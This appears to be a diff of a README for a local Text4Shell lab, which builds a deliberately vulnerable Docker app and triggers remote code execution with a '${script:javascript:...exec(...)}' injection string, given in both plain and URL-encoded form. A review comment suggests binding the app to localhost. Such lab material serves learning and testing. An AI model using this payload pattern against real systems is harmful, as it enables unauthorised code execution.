    README.md
    skipped 4 lines
    5 5  1. Maven install to create the fat jar
    6 6   
    7 7  ```
    8  - mvn clean install
     8 +mvn clean install
    9 9  ```
    10 10   
    11 11  2. Docker build
    12 12   
    13 13  ```
    14  - docker build --tag=text4shell .
     14 +docker build --tag=text4shell .
    15 15  ```
    16 16   
    17 17  3. Docker run
    18 18   
    19 19  ```
    20  - docker run -p 80:8080 text4shell
     20 +docker run -p 80:8080 text4shell
    21 21  ```
    22 22   
    23 23  4. Test the app
    24 24   
    25 25  ```
    26  - http://localhost/text4shell/attack?search=<anything>
     26 +http://localhost/text4shell/attack?search=<anything>
    27 27  ```
    28 28   
    29 29  5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
    30 30   
    31 31  ```
    32  - ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
     32 +${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
    33 33  ```
    34 34   
    35  - http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
     35 +http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
    36 36   
    37 37  6. You can also try using `dns` or `url` prefixes.
    38 38   
    39 39  7. Get the container id
    40 40   
    41 41  ```
    42  - docker container ls
     42 +docker container ls
    43 43  ```
    44 44   
    45 45  8. Get into the app
    46 46   
    47 47  ```
    48  - docker exec -it <container_id> bash
     48 +docker exec -it <container_id> bash
    49 49  ```
    50 50   
    51 51  9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):
    52 52   
    53 53  ```
    54  - ls /tmp/
     54 +ls /tmp/
    55 55  ```
    56 56   
    57 57  10. To stop the container
    58 58   
    59 59  ```
    60  - docker container stop <container_id>
     60 +docker container stop <container_id>
    61 61  ```
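Review bot: In step 3 (line 20), `docker run -p 80:8080 text4shell` publishes the deliberately vulnerable app on every host interface, while the README only ever tests it through `http://localhost`. Since these lines are being touched anyway, consider `docker run -p 127.0.0.1:80:8080 text4shell` so the endpoint from steps 4 and 5 is reachable only from the local machine. A smaller style point: the encoded URL on line 35 is the one command still outside a code fence, so it would be consistent with the rest of this cleanup to fence it like the others.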